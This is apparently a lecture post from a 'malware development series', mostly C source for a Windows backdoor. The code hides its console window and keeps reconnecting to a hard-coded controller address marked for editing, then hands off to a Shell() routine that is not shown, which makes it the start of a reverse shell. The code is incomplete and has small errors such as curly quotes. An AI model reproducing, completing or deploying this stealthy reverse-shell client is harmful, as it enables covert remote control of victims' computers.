This is lecture 1B of our malware development series
check out the video to understand more
//header files
#include <stdio.h> //standard input/output
#include <stdlib.h> //standard utilities library
#include <unistd.h> //access to the POSIX operating system API
#include <winsock2.h> //windows sockets
#include <windows.h> //declarations for all functions in Windows API
#include <winuser.h> //windows controls
#include <wininet.h> //windows internet interfaces
#include <windowsx.h> //windows programming interfaces
#include <string.h> //manupulate strings (char arrays)
#include <sys/stat.h> //stat() function prototypes
#include <sys/types.h> //other function prototypes
//FUNCTION DEFINITION
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
{
//create new window handle
HWND stealth;
AllocConsole();
stealth = FindWindowA(“ConsoleWindowClass”, NULL); //window name = NULL
ShowWindow(stealth, 0); //nCmdShow = 0 hides window
//create socket object
struct sockaddr_in ServAddr;
WSADATA wsaData; //contain winsock.dll info
//check winsock.dll status
if (WSAStartup(MAKEWORD(2,0), &wsaData) != 0)
{
exit(1);
}
//define socket object
sock = socket(AF_INET, SOCK_STREAM, 0); //establish tcp connection
//set host IP Address and Port [EDIT HERE]
char *ServIP = "192.168.56.1";
unsigned short ServPort = 50000;
memset(&ServAddr, 0, sizeof(ServAddr)); //flush ServAddr with 0
//set ServAddr parameters
ServAddr.sin_family = AF_INET;
ServAddr.sin_addr.s_addr = inet_addr(ServIP); //covert string to IPv4 format
ServAddr.sin_port = htons(ServPort); //convert to network byte order
//wait for server connection to establish
start :
while (connect(sock, (struct sockaddr *) &ServAddr, sizeof(ServAddr)) != 0)
{
Sleep(10);
goto start;
}
Shell();
}